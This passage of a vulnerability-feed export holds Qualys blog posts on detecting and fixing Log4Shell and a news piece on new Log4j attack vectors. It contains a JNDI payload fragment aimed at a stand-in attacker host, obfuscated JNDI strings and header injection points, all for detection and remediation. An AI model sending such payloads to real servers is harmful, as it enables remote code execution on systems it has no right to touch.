[documentation](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html#JndiLookup>):\n\n**_&quot;The JndiLookup allows variables to be retrieved via JNDI. By default, the key will be prefixed with java:comp/env/, however, if the key contains a &quot;:&quot; no prefix will be added.&quot;_**\n\nJNDI which stands for \u201cJava Naming and Directory Interface\u201d is a Java API which allows Java applications to perform look-ups and retrieve Java objects using protocols such as LDAP, RMI, DNS, etc. This JNDI lookup allows a developer to retrieve DataSource objects and enhance the data which is being logged by the log4j library.\n\n#### JNDI Injection\n\nOn vulnerable instances of Log4j2, any data that is being logged can trigger the application to reach out to attacker-controlled servers.\n\nAs the attack vectors are not limited to specific injection points, attackers can test the vulnerability by injecting malicious JNDI lookup payloads inside HTTP request headers or via POST request form fields such as username, email, password, etc. to test this vulnerability using:\n\n\n\nWhere vulnerable instances will parse the above payload and reach out to malicious LDAP server attacker.com via JNDI lookup method to execute the `rce_class`.\n\nIt is safe to say that the vulnerability is present in the environment due to an improper input validation vulnerability. On any new log entry if log4j encounters a JNDI lookup string starting with `${jndi:protocol://`, it will try to parse it and thereafter perform the lookup action to resolve the required variable and eventually fetch and execute the malicious `rce_class`.\n\n### Remote Code Execution POC:\n\nQualys WAS team was able to exploit the vulnerability successfully on a vulnerable instance of Log4j, below is the POC to demonstrate how attackers are exploiting this vulnerability in the real world:\n\n##### **Vulnerable application code :**\n\n\n\nFirst, the attacker injects the JNDI payload into the vulnerable application, once the input is logged by log4j, it will parse the text and try to resolve it.\n\n##### Stage one : LDAP referrer\n\nThe above payload supplied by the attacker is using LDAP protocol. The log4j library on encountering this string will make a LDAP query to the target LDAP server running on `127.0.0.1:1389`\n\nNext, the attacker uses [marshalsec](<https://github.com/mbechler/marshalsec>) package to setup a LDAP referrer that accepts incoming JNDI lookup request and creates a redirection to an HTTP server hosting the malicious class (Exploit.class) as show below:\n\n\n\n##### Stage two: Hosting malicious class\n\nHere, an HTTP server is hosting a malicious Java class which will execute a command to open a calculator application on the target server.\n\n\n\nFinally, the malicious class is download and executed leading to remote code execution.\n\n\n\n### Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect Apache Log4j Remote Code Execution vulnerability (CVE-2021-44228) with Qualys Web Application Scanning using **QID 150440**, **150441**:\n\nQID 150440 - Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\nThe WAS module injects JNDI payload into the headers listed below, application specific vulnerable endpoints and uses Out Of Band (OOB) detection mechanism where vulnerable instances will make a callback DNS query that will trigger Qualys Periscope detection mechanism :\n\n 1. X-Api-Version\n 2. User-Agent\n 3. Referer\n 4. X-Druid-Comment\n 5. Origin\n 6. Location\n 7. X-Forwarded-For\n 8. Cookie\n 9. X-Requested-With\n 10. X-Forwarded-Host\n 11. Accept\n 12. Authentication\n 13. Authorization\n\nVulnerable Applications detection covered under QID 150440:\n\n 1. Apache Struts2\n 2. Apache Solr\n 3. Apache Druid\n 4. Apache OFBiz\n 5. Apache JSPWiki\n\nQualys WAS OOB service uses unique DNS payload on every request which makes the detection mechanism accurate in identifying the vulnerability.\n\n### WAS Log4Shell Detection Methodology with Qualys Periscope\n\n\n\nWhen WAS tests a web application for the Log4Shell vulnerability, the following steps are performed:\n\n 1. WAS makes multiple requests with specially crafted payloads in the request header fields listed above. For example, the &#x27;User-Agent&#x27; here has been modified to include a specific payload to Qualys Periscope:\n\n\n\n 2. If the scanned application is vulnerable to Log4Shell, it will attempt to connect to the address in the modified request header. However, it must first resolve the FQDN for the domain qualysperiscope.com shown in the payload.\n 3. As part of the DNS resolution process:\n 1. The request is received by the Qualys Periscope DNS service.\n 2. The DNS service processes the request to verify the hash embedded in the request is valid. This ensures the lookup request is genuine and was generated by a WAS scan.\n 3. If the hash is verified, Periscope logs the request internally.\n 4. If verification fails, the request is dropped.\n 4. WAS then queries Periscope with the lookup request data along with the scan ID and hash for each of the injected request header payloads.\n 1. Periscope verifies the hash from WAS and either:\n 1. Matches the WAS query against a logged lookup request from the web application - the site is vulnerable to Log4Shell.\n 2. Fails to match the WAS query against a logged lookup request from the web application - the site is not vulnerable.\n 5. WAS processes the data received from Qualys Periscope, and reports any vulnerabilities corresponding to payloads which were successfully executed.\n\n### Scan Configurations :\n\nQID 150440 has been added to the WAS Core Detection Scope, so all scans using the Core detection will include this QID in scanning. However, to expedite testing for CVE-2021-44228 across all of your web applications, it is recommended that you create a new scanning Option Profile to limit testing to only this specific vulnerability. This can be done by creating a new Option Profile and selecting \u201cCustom Search Lists\u201d under the Detection Scope to create a new static list.\n\n\n\nComplete the creation wizard and add QID 150440 to the Static Search List.\n\n\n\nOptionally you can add Information Gathered (IG) QIDs for confirmation of links crawled, scan diagnostics, etc. IG QIDs will not significantly impact the efficiency of the scan.\n \n \n IG QIDs: 6 ,38116 ,38291 ,38597 ,38600 ,38609 ,38704 ,38706 ,38717 ,38718 ,42350 ,45017 ,45038 ,45218 ,86002 ,90195 ,150005 ,150006 ,150007 ,150008 ,150009 ,150010 ,150014 ,150015 ,150016 ,150017 ,150018 ,150019 ,150020 ,150021 ,150024 ,150025 ,150026 ,150028 ,150029 ,150030 ,150032 ,150033 ,150034 ,150035 ,150036 ,150037 ,150038 ,150039 ,150040 ,150041 ,150042 ,150043 ,150044 ,150045 ,150054 ,150058 ,150061 ,150065 ,150066 ,150067 ,150077 ,150078 ,150080 ,150082 ,150083 ,150086 ,150087 ,150089 ,150094 ,150095 ,150097 ,150099 ,150100 ,150101 ,150104 ,150105 ,150106 ,150111 ,150115 ,150116 ,150125 ,150126 ,150135 ,150140 ,150141 ,150142 ,150143 ,150148 ,150152 ,150157 ,150164 ,150167 ,150168 ,150169 ,150170 ,150172 ,150176 ,150177 ,150182 ,150183 ,150184 ,150185 ,150186 ,150194 ,150195 ,150197 ,150202 ,150203 ,150204 ,150205 ,150206 ,150208 ,150210 ,150244 ,150245 ,150247 ,150257 ,150261 ,150262 ,150265 ,150277 ,150291 ,150292 ,150308 ,150325 ,150344 ,150345 ,150348 ,150350 ,150351 ,150352\n\nWe recommend limiting the scan to between 50 and 100 links in scope maximum.\n\n\n\nAdditionally, configure the scan to be launched at &quot;Maximum&quot; Performance for faster scan completion.\n\n\n\nScanning with the above mentioned scan configurations will achieve two things to expedite testing your web applications in the most efficient way possible. First, we are only testing for one specific vulnerability, QID 150440. Second, as this vulnerability is only tested at the base URI and several directories up and down as appropriate, there is no need to crawl and test every link in the application. These two changes will allow each web application to be scanned faster than full Core detection scans while still providing you the necessary visibility of any vulnerable versions of Log4j2.\n\n#### Report : 150440\n\nOnce the vulnerability is successfully detected, users shall see similar kind of results for QID 150440 in the vulnerability scan report:\n\n\n\nAs you can see in the above report, the payload is injected inside **User-Agent** request header and makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\nQualys WAS has released QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228), which injects JNDI payloads into every user input form field ex. (username, email, password) which makes it more reliable and efficient detection in comparison to open source scanning scripts written in Python and Golang which have limited scanning capability.\n\nAfter injecting JNDI payloads into every form field, the vulnerable application makes a DNS lookup request to Qualys Periscope mechanism:\n\nQID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\n#### Report : 150441\n\nOn successful detection, users shall see similar results in vulnerability scan report:\n\n\n\nIn the above report we can see, specially crafted payload was sent via HTTP POST request to uname parameter of the application login form, which then makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\n### About CVE-2021-45046\n\nApache Log4j 2.15.0 was released to address CVE-2021-44228 but it turned out that the fix was incomplete in certain non-default configuration setup. In CVE-2021-45046, security measures were added to version 2.15.0 to prevent remote code execution by restricting JNDI LDAP lookups to localhost by default, i.e., a remote connection to `attacker.com` will be blocked in `${jndi:ldap://attacker.com` payload.\n\nAccording to [Apache Security advisory](<https://logging.apache.org/log4j/2.x/security.html>) when the logging configuration uses non-default pattern layout with a [Context Lookup](<https://logging.apache.org/log4j/2.x/manual/lookups.html#ContextMapLookup>) value ex. `$${ctx:loginId-value}`, attackers with control over [Thread Context Map](<https://logging.apache.org/log4j/2.x/manual/thread-context.html>) (Mapped Diagnostic Context or MDC) input data can craft malicious input data using a JNDI Lookup pattern which would allow data exfiltration and remote code execution in certain scenarios.\n\n### About CVE-2021-44832\n\nThe arbitrary code execution vulnerability discovered in version 2.17.0 affects Log4j2 instances when an attacker with permission to modify the logging configuration can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n\nThe Qualys WAS research team is constantly working to find more attack vectors and will update the signatures accordingly. We are also working on detecting the vulnerability affecting applications using Log4j logging utility and will update new QIDs as needed.\n\n### Solution\n\nIt is strongly recommended to upgrade to the latest **Apache Log4j 2.17.1** to remediate these vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832). According to [Apache Security Advisory](<https://logging.apache.org/log4j/2.x/security.html>) version 2.17.1 also remediates DoS vulnerability (CVE-2021-45105) which was present in version 2.16.0.\n\nRelease details Apache Log4j 2.17.1 : https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1\n\nIn cases where upgrading the version is not possible, we recommend applying the following mitigation guidelines:\n\n * **For Log4j 1.x** : Applications using Log4j 1.x are only vulnerable to CVE-2021-44228 when they use JNDI in their configuration. CVE-2021-4104 has been filed to track this vulnerability and can be mitigated by auditing logging configuration to ensure it has no JMSAppender configured.\n * **For Log4j 2.x** : Implement one of the mitigation techniques below :\n * Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n * In prior releases confirm that if the JDBC Appender is being used, it is not configured to use any protocol other than Java.\n * Remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.\n\nFor latest updates on solution and mitigation guidelines, please refer to [Apache Log4j security advisory](<https://logging.apache.org/log4j/2.x/security.html>)\n\n### Credits\n\n**Apache Security Advisory**: <https://logging.apache.org/log4j/2.x/security.html>\n\n**CVE Details**:\n\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-45046>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44832>\n\n**Credits for the vulnerability discovery go to:**\n\n * Chen Zhaojun of Alibaba Cloud Security Team.\n * Kai Mindermann of iC Consult and separately by 4ra1n\n\n### References:\n\n * <https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce>\n * <https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/>\n * <https://www.lunasec.io/docs/blog/log4j-zero-day/>\n * <https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **John Delaroderie**, Director, Product Management, Web App Security, Qualys\n\nPlease contact [John Delaroderie](<mailto:jdelaroderie@qualys.com>) if you need further information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T17:06:36", "type": "qualysblog", "title": "Is Your Web Application Exploitable By Log4Shell Vulnerability?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-15T17:06:36", "id": "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T20:37:15", "description": "In recent days, the cybersecurity industry has been rapidly assessing the full impact of the Log4Shell (CVE-2021-44228 and CVE-2021-45046) vulnerability. Many organizations are quickly trying to figure out whether this vulnerability is within their environment, and where. The next question a security operations team will ask is if its presence has been exploited. This is critical to answer quickly given Log4Shell\u2019s high severity, the pervasiveness of Java, and its ease of exploitation.\n\nIn a previous blog we discussed [how to mitigate](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>) the threat of this vulnerability via a patch or configuration change. Now let\u2019s take a deep dive into how this exploit unfolds, and how you can quickly assess if Log4Shell has been exploited in your environment.\n\n### How the Exploit Works\n\nSimilar to many other remote code execution vulnerabilities, Log4Shell can be exploited due to input not being validated by the code. When using the log4j2 functionality, the text being logged can use what are known as [lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). For example, if you wanted to log the version of Java or perhaps the operating system running the application, you can denote that within the logged string such as `${java:version}` or `${java:os}`, respectively. Since the input is not being validated, whoever controlled the test of the log could leverage these lookups.\n\nWhat this specific exploit is doing is leveraging the Jndi Lookup feature. JNDI is the Java Naming and Directory Interface which provides an interface to LDAP, CORBA, RMI, and DNS functionality. When used as directed, this provides a valuable way for developers to quickly lookup information from those services. However, since there was no input validation in the vulnerable instances of Log4J2, this gives attackers the opportunity to run arbitrary code remotely from anywhere in the world.\n\nArmed with this information, attackers are running scans on the internet looking for vulnerable hosts directly connected to the internet. A simple non-malicious test to conduct is to force the vulnerable machine to make a DNS lookup. Without running suspicious commands or injecting malicious code onto a machine, this is a quick way to validate that the vulnerability exists.\n\nTo do this, attackers have been seen placing the malicious Jndi Lookup string anywhere they suspect a field could be logged. This could be anything \u2013 such as forms on websites intended for user interaction to hidden fields used by machines (e.g. the user agent of the web browser). There have even been instances of vulnerable machines being detected using an wrongly placed SSID being read and logged by other machines locally. With the prevalence of Java running on 15 billion devices worldwide, the attack surface of the Log4Shell vulnerability is enormous.\n\nLet\u2019s review 6 key detection opportunities to help you locate the Log4Shell vulnerability within your environment.\n\n#### Detection Opportunity 1: Scan Logs for Malicious Strings\n\nSince this is an attack on the logging server, you may be actively collecting those logs into a centralized location such as a log manager, SIEM, or XDR solution. First, you should look for sample strings known for this exploit, such as \u201cJNDI\u201d. This will not be an exhaustive search, as the commands can be heavily obfuscated, such as adding printing out JNDI as `${::-j}${::-d}${::-d}${::-i}` or `${lower:j}${lower:n}${lower:d}${lower:i}`. The combinations of obfuscation can be nearly endless, so it\u2019s important to rely on detection in depth and to look for post exploitation events as well.\n\nAnother important aspect to remember is that only _failed_ exploit attempts will be visible in the logs. If the exploit is successful and the payload is correctly interpreted by the JNDI handler, the payload will execute without making any entry in the logs. As such, a successful exploit will most probably be blind to log inspection.\n\n#### Detection Opportunity 2: Look for Java Making Network Connections\n\nThe core component of this exploit is that Log4J2 is leveraging the lookup functionality to make a network lookup to these remote services (LDAP, RMI, etc.). While Java making network connections itself is not anomalous in itself, making connections to these services suddenly this week is highly suspect.\n\nThe following QQL queries in Qualys EDR can isolate hosts which have these types of connections:\n\n * process.name:&quot;java&quot; and network.remote.address.port:53 and type:NETWORK and action:ESTABLISHED\n * process.name:&quot;java&quot; and network.remote.address.port:389 and type:NETWORK and action:ESTABLISHED\n * process.name:&quot;java&quot; and network.remote.address.port:1389 and type:NETWORK and action:ESTABLISHED\n * process.name:&quot;java&quot; and network.remote.address.port:636 and type:NETWORK and action:ESTABLISHED\n * process.name:&quot;java&quot; and network.remote.address.port:1098 and type:NETWORK and action:ESTABLISHED\n * process.name:&quot;java&quot; and type:NETWORK and action:ESTABLISHED\n\nThe first four commands will hunt for Java processes making connections to remote DNS, LDAP, LDAPS, or RMI services. The final command is more generic and will find all instances of Java making a network connection. This will be useful to broaden the search to validate network connections for potential exploits still unknown at the time of this writing.\n\n\n\n#### Detection Opportunity 3: Look for Java Calling Suspicious Processes\n\nOnce an attacker validates that a system is exploitable, they will try to execute code on the victim\u2019s machine. This could come in the form of downloading malicious files or executing trusted binaries in malicious ways using Living off the Land \u2013 Binaries and Scripts (LOLBAS) techniques. Commonly you will see something such as scripting languages or data transfer utilities.\n\nThe following QQL queries can find evidence of such activity:\n\n * process.parentname: &quot;java&quot; and process.name: &quot;cmd.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;powershell.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;pwsh.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;wscript.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;cscript.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;python.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;perl.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;ruby.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;curl.exe&quot;\n * process.parentname: &quot;java&quot; and process.name: &quot;wget.exe&quot;\n\n\nRunning these \u201cas is\u201d will likely return results of benign and known applications. These can then be used to filter out known-good (what?) and narrow down suspicious invocations of the exploit taking place.\n\n#### Detection Opportunity 4: Hunt for Java Processes Using Log4J2\n\nSimply looking for applications that are known to load Log4J2 will be useful in understanding your attack surface. This will provide insight on machines which may be actively vulnerable to exploit. Use the following QQL in Qualys EDR to find instances of log4j2 being loaded:\n\n * process.arguments:&quot; log4j-core-2\u2033\n\n\nAlternatively, as a broader search you can find all assets that are running Java in your environment by using the following QQL search:\n\n * process.name:&quot;java&quot;\n\n#### Detection Opportunity 5: Search for Known Payloads\n\nPost exploitation activities (after an adversary gains access) often include dropping various malware families on the box. The malware that gets deployed will be entirely dependent on the adversary taking the action. The following malware families have been observed exploiting Log4Shell already:\n\n * Bazarloader\n * Mirai\n * Various Cryptocurrency Mining Software\n\nThe presence of Bazarloader leads Qualys to believe that this vulnerability will be actively used by some of the more well-known adversarial groups. Searching for the presence of malware and performing a comprehensive incident response into where it originated is especially important given the prevalence of the Log4Shell vulnerability.\n\n#### ****Detection Opportunity 6: Find Evidence of Exploitation Attempts****\n\nFor Qualys EDR customers who are leveraging the AntiMalware engine, there are specific detections that can be searched within the environment to find evidence of someone attempting to exploit this vulnerability. These detections are specifically looking at the network traffic which the java process will make when performing the Jndi lookups mentioned above. \n\nTo find these exploit attempts, you can leverage the following queries:\n\n * event.networkDetectionName:&quot;Exploit.HTTP.CVE-2021-44228.Log4Shell&quot;\n * event.networkDetectionName:&quot;Exploit.CVE-2021-4228.Log4Shell&quot;\n\n\n### Key Points\n\nWhile the Log4Shell vulnerability is grabbing headlines around the world, it is important to remember that there remain other active threats. Proactively preventing, detecting, and responding to adversarial behavior will ensure that you are protected against all of them.\n\nEach of these 6 detection opportunities and how Qualys prevents Log4Shell attacks are described in this recent blog. Additionally, leveraging the MITRE ATT&amp;CK framework to hunt for post exploitation activity can yield valuable insights while hunting for adversarial activity. Looking at an [adversarial playbook](<https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware>), we know that some of the initial steps an attacker will take are performing reconnaissance to get situational awareness, lateral movement to find your \u201ccrown jewels\u201d, and credential access to make their attacks successful.\n\nSearching for such activity is made easy with the Qualys EDR. For example, high level searches such as these can find high level behaviors:\n\n * mitre.attack.tactic.name: &quot;Reconnaissance&quot;\n * mitre.attack.tactic.name:&quot;Lateral Movement&quot;\n * mitre.attack.tactic.name:&quot;Credential Access&quot;\n\n### Prevent Future Attacks\n\nPatching with a software vendor\u2019s security update is the best bet to plug known vulnerabilities. Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>) can also [remove](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>) the JndiLookup.class to neuter the exploitation of Log4Shell altogether.\n\nMulti-Vector EDR is continually updated with the latest threat intelligence and detection techniques to constantly monitor endpoints and to protect against existing and future exploits of the Log4Shell vulnerability.\n\nThe Qualys Malware Threat Research Team anticipates that what we know today is just the tip of the iceberg. We predict that there will be an avalanche of malware and attacks exploiting Log4Shell throughout the remainder of 2021 and 2022. You can be assured that we will continue monitoring the situation 24/7 to ensure coverage of any new exploit techniques.\n\n### Free 30 Days of Qualys Multi-Vector EDR\n\nTo help security teams protect, detect, and respond to Log4Shell Exploits, Qualys is offering [Multi-Vector EDR free for 30 days](<https://www.qualys.com/forms/endpoint-detection-response/>). Sign up today to take advantage of this limited time offer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T05:41:36", "type": "qualysblog", "title": "6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4228", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-20T05:41:36", "id": "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiYzbIU7R9nN2oIk1ciBcv2vaWUtyaHDVCxO6AHIZCEYTx3GCZNldfvKElxTsKQ3d8sT4wVsXjtN1n4N5nF8nOUcLKVddcnAlh79u7se9VRiipUBpow3KEX9pnDWfkaTZ88L860JSKNR_f_u0glZTztzOJ6HMPLK4NhqhGLFEtswwSA8yQXpixGk7NP>)\n\nCybersecurity researchers have discovered an entirely new attack vector that enables adversaries to exploit the Log4Shell vulnerability on servers locally by using a JavaScript WebSocket connection.\n\n\"This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability,\" Matthew Warner, CTO of Blumira, [said](<https://www.blumira.com/analysis-log4shell-local-trigger/>). \"At this point, there is no proof of active exploitation. This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.\"\n\n[WebSockets](<https://en.wikipedia.org/wiki/WebSocket>) allow for two-way communications between a web browser (or other client application) and a server, unlike HTTP, which is unidirectional where the client sends the request and the server sends the response.\n\nWhile the issue can be resolved by updating all local development and internet-facing environments to Log4j 2.16.0, Apache on Friday rolled out [version 2.17.0](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>), which remediates a denial-of-service (DoS) vulnerability tracked as CVE-2021-45105 (CVSS score: 7.5), making it the third Log 4j2 flaw to come to light after [CVE-2021-45046](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) and [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>).\n\nThe complete list of flaws discovered to date in the logging framework after the original [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) remote code execution bug was disclosed is as follows \u2014\n\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0) \n * [**CVE-2021-45046**](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n * [**CVE-2021-45105**](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n * [**CVE-2021-4104**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)\n\n\"We shouldn't be surprised that additional vulnerabilities were discovered in Log4j given the additional specific focus on the library,\" Jake Williams, CTO and co-founder of incident response firm BreachQuest, said. \"Similar to Log4j, this summer the original [PrintNightmare](<https://thehackernews.com/2021/07/researcher-uncover-yet-another.html>) vulnerability disclosure led to the discovery of multiple additional distinct vulnerabilities. The discovery of additional vulnerabilities in Log4j shouldn't cause concern about the security of log4j itself. If anything, Log4j is more secure because of the additional attention paid by researchers.\"\n\nThe latest development comes as a number of threat actors have piled on the Log4j flaws to mount a variety of attacks, including ransomware infections involving the Russia-based Conti group and a new ransomware strain named Khonsari. What's more, the Log4j remote code execution flaw has also opened the door to a third ransomware family known as TellYouThePass that's being used in attacks against Windows and Linux devices, according to researchers from [Sangfor](<https://www.secpulse.com/archives/171335.html>) and [Curated Intel](<https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html>).\n\n## Bitdefender Honeypots Signal Active Log4Shell 0-Day Attacks Underway\n\nThe easily exploited, ubiquitous vulnerability, aside from spawning as many as 60 variations, has presented a perfect window of opportunity for adversaries, with Romanian cybersecurity firm Bitdefender noting that more than 50% of the attacks are leveraging the Tor anonymity service to mask their true origins.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgNPE2pC0Ku_ivYoF8O58gjuW50tDKEeLPrUszibwtwZAlhHvzaJrWZlCMNJrF0C0NEu0HYbx1fjUwY_G79NLw59eWriIs7wF5AX9ZOPhsKj4MfUsGeMpfWxCDrZo7JK77zBql24kKMdtpaoMKJA6TXNraauizxkWDmpGm7Q7PYpzqVR9TVRySlpz7o>)\n\n\"In other words, threat actors exploiting Log4j are routing their attacks through machines that are closer to their intended targets and just because we don't see countries commonly associated with cybersecurity threats at the top of the list does not mean that attacks did not originate there,\" Martin Zugec, technical solutions director at Bitdefender, [said](<https://businessinsights.bitdefender.com/log4shell-the-call-is-coming-from-inside-the-house>).\n\nAccording to telemetry data collected between December 11 and December 15, Germany and the U.S. alone accounted for 60% of all the exploitation attempts. The most common attack targets during the observation period were the U.S., Canada, the U.K., Romania, Germany, Australia, France, the Netherlands, Brazil, and Italy.\n\n## Google: Over 35,000 Java Packages Affected by the Log4j Flaw\n\nThe development also coincides with an analysis from Google's Open Source Insights Team, which found that roughly 35,863 Java packages \u2014 accounting for over 8% of the Maven Central repository \u2014 use vulnerable versions of the Apache Log4j library. Of the affected artifacts, only around 7,000 packages have a direct dependency on Log4j.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiZtL6d9DB2VIh84ClMGtP3UHhwCXzUfx9pk54dOhr-1m4zlml00t3CdzSkwuK4GdAqjdzDa3M0qgUyiad3rl4G-JmOfuvVnBqQDW7bfvjIEy7bQz_AXTwLr_Gx_JfQ7EQT5zKvpQEgnJtqh5b1A_i8b8kdB-iz_ohiztQEIQ4miCopLEAiKWj0e6td>)\n\n\"User's lack of visibility into their dependencies and transitive dependencies has made patching difficult; it has also made it difficult to determine the full blast radius of this vulnerability,\" Google's James Wetter and Nicky Ringland [said](<https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html>). But on the positive side of things, 2,620 of the impacted packages have already been fixed less than a week after disclosure.\n\n\"There will likely be some time before we understand the full fallout of the log4j vulnerability, but only because it's embedded in so much software,\" Williams said. \"This has nothing to do with threat actor malware. It has to do with the difficulty in finding the myriad places the library is embedded. The vulnerability itself will provide initial access for threat actors who will later perform privilege escalation and lateral movement \u2013 that's where the real risk is.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:18:00", "type": "thn", "title": "New Local Attack Vector Expands the Attack Surface of Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 